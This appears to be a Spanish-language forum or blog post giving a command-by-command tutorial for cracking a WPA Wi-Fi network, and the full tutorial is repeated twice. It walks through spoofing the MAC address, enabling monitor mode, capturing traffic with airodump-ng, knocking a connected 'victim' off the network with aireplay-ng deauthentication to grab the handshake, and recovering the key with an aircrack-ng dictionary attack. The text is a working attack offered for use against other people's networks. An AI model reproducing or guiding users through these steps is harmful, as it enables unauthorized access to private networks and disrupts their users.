eh esto leeyendo y no ehvisto ningun tuto de hacking wpa y todos preguntanpor eso. eh respondido varios temas como bien venida les eh escho este post que tenia en mi foro. leean con antencion
Tratare de explicar el hackeo de una red, inalambrica Wifi. con seguridad (wpa)
Bueno lo primero que devemos saber es, que esta encryptacion no necesita datas ni ivs. cuenta de un buen diccionario.
Primera entendamos un poco.
El diccionario lo podemos descargar en el se encuentran palabras millones de palabras. multiilenguajes. etc.
Cada uno de nosotros podemos armar un diccionario con todas las palabras que deseomos. Pero queda claro decir que no existe ningun diccionario con tu propia /o pass.
TAl diccionario no existe.
TAmbien devemos tener encuenta que deve de haber clientes conectados. al AP De echo no se podra. Empesemos.
Lo primero es. cambiar la direccion mac de nuestra tarjeta.
Antes devemos dar de baja en interfas Wlan0 cabiar por el sullo.
ifconfig wlan0 down dado de baja
macchanger -m 00:11:22:33:44:55 wlan0 nos aparecera el cambio de la mac.
Reaccion.
Echo esto ya tenemos nuestra mac falsa.
lo siguiente sera poner dar de alta la tarjeta o el interfas.
ifconfig wlan0 up
Reaccion.
Ahora a que ponerla en modo monitor podemos hacerlo con airmon-ng o con este simple comando.
iwconfig wlan0 mode monitor
Reaccion.
Como vemos no nos ah marcado error ni nada prosigamos.
Escanearemos canales en busca de redes. wpa con cliente. Usaremos airodump-ng
airodump-ng wlan0
Reaccion.
Una vez localizado el AP presionamos control c para detener la accion de la shell.
tomamos encuenta la mac del AP y la mac del cliente
Capturamos trafico del canal con airodump-ng
airodump-ng --bssidMac_ap -cCanal -w Nombre_del_fichero wlan0
airodump-ng --bssid 00:14:95:xx:xx -c6 -w handshake wlan0
Reaccion.
Como vemos en la imagen de la Shell de lado superior derecho No emos conseguido, aun el handshake, necesitamos hacer un A0
Desauntentificar al cliente conectado al AP, desconectarlo y cuando el cliente reconecte. tendremos nuestro handshake.
EL HANDSHAKE es como un saludo un simple apreton de manos. tomenlo en cuenta como eso
Usamos aireplay-ng A0
aireplay-ng -0 20 -a MAC_AP -c MAC_CLIENTE wlan0
aireplay-ng -0 20 -a 00:14:95:xx:xx -c 00:0f:cb:xx:xx wlan0
Reaccion.
Mientras tanto lo que paso en la pc de la victima. Cliente
El cliente fue descoenctado y reconecto.
Bueno ya que obtuvimos el handshake.
Solo falta verificar si si lo tenemos. usaremos aircrack-ng para verrificar
aircrack-ng /root/swireless/archivo.cap
aircrack-ng /root/swireless/handshake.cap
Reaccion.
Como vemos todo a salido bien
aircrack-ng /root/swireless/archivo.cap -w /root/swireless/wordlist/nombre_del_diccionario:txt
SE me olvidaba algo el diccionario deve de ir en la ruta /root/swireless/wordlist. y deve ser renombrado a diccionario.txt
aircrack-ng /root/swireless/handshake.cap -w /root/swireless/wordlist/diccionario.txt
Solo falta pasarle aircrack-ng con diccionario al handshake y listo
Una vez echo eso reaccionaara asi encontrando la key :P :P
Reaccion.
Espero les aya gustado. esta muy resumido. y muy explicado Gracias.
funciona con bakctrack para otros usuarios recomeindo que usen wifiway antes que backtrack
Saludos
Tratare de explicar el hackeo de una red, inalambrica Wifi. con seguridad (wpa)
Bueno lo primero que devemos saber es, que esta encryptacion no necesita datas ni ivs. cuenta de un buen diccionario.
Primera entendamos un poco.
El diccionario lo podemos descargar en el se encuentran palabras millones de palabras. multiilenguajes. etc.
Cada uno de nosotros podemos armar un diccionario con todas las palabras que deseomos. Pero queda claro decir que no existe ningun diccionario con tu propia /o pass.
TAl diccionario no existe.
TAmbien devemos tener encuenta que deve de haber clientes conectados. al AP De echo no se podra. Empesemos.
Lo primero es. cambiar la direccion mac de nuestra tarjeta.
Antes devemos dar de baja en interfas Wlan0 cabiar por el sullo.
ifconfig wlan0 down dado de baja
macchanger -m 00:11:22:33:44:55 wlan0 nos aparecera el cambio de la mac.
Reaccion.
Echo esto ya tenemos nuestra mac falsa.
lo siguiente sera poner dar de alta la tarjeta o el interfas.
ifconfig wlan0 up
Reaccion.
Ahora a que ponerla en modo monitor podemos hacerlo con airmon-ng o con este simple comando.
iwconfig wlan0 mode monitor
Reaccion.
Como vemos no nos ah marcado error ni nada prosigamos.
Escanearemos canales en busca de redes. wpa con cliente. Usaremos airodump-ng
airodump-ng wlan0
Reaccion.
Una vez localizado el AP presionamos control c para detener la accion de la shell.
tomamos encuenta la mac del AP y la mac del cliente
Capturamos trafico del canal con airodump-ng
airodump-ng --bssidMac_ap -cCanal -w Nombre_del_fichero wlan0
airodump-ng --bssid 00:14:95:xx:xx -c6 -w handshake wlan0
Reaccion.
Como vemos en la imagen de la Shell de lado superior derecho No emos conseguido, aun el handshake, necesitamos hacer un A0
Desauntentificar al cliente conectado al AP, desconectarlo y cuando el cliente reconecte. tendremos nuestro handshake.
EL HANDSHAKE es como un saludo un simple apreton de manos. tomenlo en cuenta como eso
Usamos aireplay-ng A0
aireplay-ng -0 20 -a MAC_AP -c MAC_CLIENTE wlan0
aireplay-ng -0 20 -a 00:14:95:xx:xx -c 00:0f:cb:xx:xx wlan0
Reaccion.
Mientras tanto lo que paso en la pc de la victima. Cliente
El cliente fue descoenctado y reconecto.
Bueno ya que obtuvimos el handshake.
Solo falta verificar si si lo tenemos. usaremos aircrack-ng para verrificar
aircrack-ng /root/swireless/archivo.cap
aircrack-ng /root/swireless/handshake.cap
Reaccion.
Como vemos todo a salido bien
aircrack-ng /root/swireless/archivo.cap -w /root/swireless/wordlist/nombre_del_diccionario:txt
SE me olvidaba algo el diccionario deve de ir en la ruta /root/swireless/wordlist. y deve ser renombrado a diccionario.txt
aircrack-ng /root/swireless/handshake.cap -w /root/swireless/wordlist/diccionario.txt
Solo falta pasarle aircrack-ng con diccionario al handshake y listo
Una vez echo eso reaccionaara asi encontrando la key :P :P
Reaccion.
Espero les aya gustado. esta muy resumido. y muy explicado Gracias.
funciona con bakctrack para otros usuarios recomeindo que usen wifiway antes que backtrack
Saludos
0 comentarios:
Publicar un comentario